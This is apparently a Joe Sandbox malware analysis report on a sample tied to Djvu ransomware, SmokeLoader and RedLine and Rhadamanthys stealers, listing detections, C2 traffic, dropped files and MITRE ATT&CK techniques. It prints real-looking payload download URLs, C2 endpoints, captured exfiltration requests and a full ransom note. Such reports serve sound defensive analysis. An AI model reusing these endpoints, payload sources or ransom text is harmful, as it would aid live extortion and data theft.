Start time:	09:45:10
Start date:	25/01/2023
Path:	C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exe
Imagebase:	0x400000
File size:	752246784 bytes
MD5 hash:	A4C9D357EA9C7679D978EB985F61E6C5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exePID: 4908, Parent PID: 4500

General

Target ID:	42
Start time:	09:45:36
Start date:	25/01/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAOQAwAA==
Imagebase:	0x7ff665920000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Analysis Process: conhost.exePID: 4044, Parent PID: 4908

General

Target ID:	43
Start time:	09:45:36
Start date:	25/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Disassembly

⊘No disassembly

Source: http://tempuri.org/Entity/Id19Responseon	URL Reputation: Label: phishing
Source: http://tempuri.org/Entity/Id19Responseon	URL Reputation: Label: phishing
Source: http://drampik.com/lancer/get.php	Avira URL Cloud: Label: malware

Source: potunulit.org	Virustotal: Detection: 11%	Perma Link
Source: http://drampik.com/lancer/get.php	Virustotal: Detection: 11%	Perma Link
Source: 89.208.103.88:37538	Virustotal: Detection: 5%	Perma Link

Source: C:\Users\user\AppData\Local\Temp\226F.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Virustotal: Detection: 39%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\2560.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\336E.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Local\Temp\5898187.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\dbjigst	ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll	ReversingLabs: Detection: 61%

Source: C:\Users\user\AppData\Local\Temp\2560.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\dbjigst	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5898187.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Library.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\226F.exe	Joe Sandbox ML: detected

Source: Traffic	Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49733 -> 89.208.103.88:37538
Source: Traffic	Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49733 -> 89.208.103.88:37538
Source: Traffic	Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 89.208.103.88:37538 -> 192.168.2.3:49733
Source: Traffic	Snort IDS: 2043202 ET TROJAN Rhadamanthys Stealer - Payload Download Request 192.168.2.3:49735 -> 109.206.243.168:80
Source: Traffic	Snort IDS: 2853001 ETPRO TROJAN Rhadamanthys Stealer - Payload Response 109.206.243.168:80 -> 192.168.2.3:49735
Source: Traffic	Snort IDS: 2853002 ETPRO TROJAN Rhadamanthys Stealer - Data Exfil 192.168.2.3:49736 -> 109.206.243.168:80
Source: Traffic	Snort IDS: 2853002 ETPRO TROJAN Rhadamanthys Stealer - Data Exfil 192.168.2.3:49760 -> 109.206.243.168:80

Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://drampik.com/files/1/build3.exe"], "C2 url": "http://drampik.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-cud8EGMtyB\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0637JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Wi
Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://bulimu55t.net/", "http://soryytlic4.net/", "http://bukubuka1.net/", "http://novanosa5org.org/", "http://hujukui3.net/", "http://newzelannd66.org/", "http://golilopaster.org/"]}
Source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "89.208.103.88:37538", "Bot Id": "birj proliv", "Authorization Header": "9941068ef2768ed5ba54fc3eed22d795"}

Source: Malware configuration extractor	URLs: http://drampik.com/lancer/get.php
Source: Malware configuration extractor	URLs: 89.208.103.88:37538
Source: Malware configuration extractor	URLs: http://bulimu55t.net/
Source: Malware configuration extractor	URLs: http://soryytlic4.net/
Source: Malware configuration extractor	URLs: http://bukubuka1.net/
Source: Malware configuration extractor	URLs: http://novanosa5org.org/
Source: Malware configuration extractor	URLs: http://hujukui3.net/
Source: Malware configuration extractor	URLs: http://newzelannd66.org/
Source: Malware configuration extractor	URLs: http://golilopaster.org/

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dipcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pdujeftq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 278Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lmkympntg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://khpcnlkw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://avuxv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://hdmcxxriay.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mgqyrb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://efxdannslj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://scyxiteu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://opfakis.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ntishu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: potunulit.org
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://biwrdybrv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: potunulit.org

Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153
Source: Joe Sandbox View	IP Address: 144.76.136.153 144.76.136.153

Source: global traffic	HTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
Source: global traffic	HTTP traffic detected: GET /get/pMeglv/Blue.bin HTTP/1.1Host: transfer.shConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /upload/libcurl.dll HTTP/1.1Host: 109.206.243.168User-Agent: curl/5.9Connection: closeX-CSRF-TOKEN: fmink0nOam7KoC/9AgKuecKr+zF4JrNpfDFMHBsXu52X3IlDVGlEcd+VtBrKAYeaJ5PIJVhvN1kt2smq7jZylA==Cookie: CSRF-TOKEN=fmink0nOam7KoC/9AgKuecKr+zF4JrNpfDFMHBsXu52X3IlDVGlEcd+VtBrKAYeaJ5PIJVhvN1kt2smq7jZylA==; LANG=en-US
Source: global traffic	HTTP traffic detected: GET /upload/libcurl.dll HTTP/1.1Host: 109.206.243.168User-Agent: curl/5.9Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: owA5TgXDAlJegBd
Source: global traffic	HTTP traffic detected: GET /upload/libcurl.dll HTTP/1.1Host: 109.206.243.168User-Agent: curl/5.9Upgrade: websocketConnection: upgradeSec-Websocket-Version: 13Sec-Websocket-Key: Bn5huQMTqqBNkhY

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749

Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88
Source: unknown	TCP traffic detected without corresponding DNS query: 89.208.103.88

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report aw9Ynwqd1x.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Djvu

Threatname: RedLine

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NGenTask.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\226F.exe

C:\Users\user\AppData\Local\Temp\2560.exe

C:\Users\user\AppData\Local\Temp\336E.exe

C:\Users\user\AppData\Local\Temp\5898187.dll

C:\Users\user\AppData\Local\Temp\Library.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jbitbac.qx5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfuf4nv3.1n4.psm1

Windows Analysis Report
aw9Ynwqd1x.exe

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre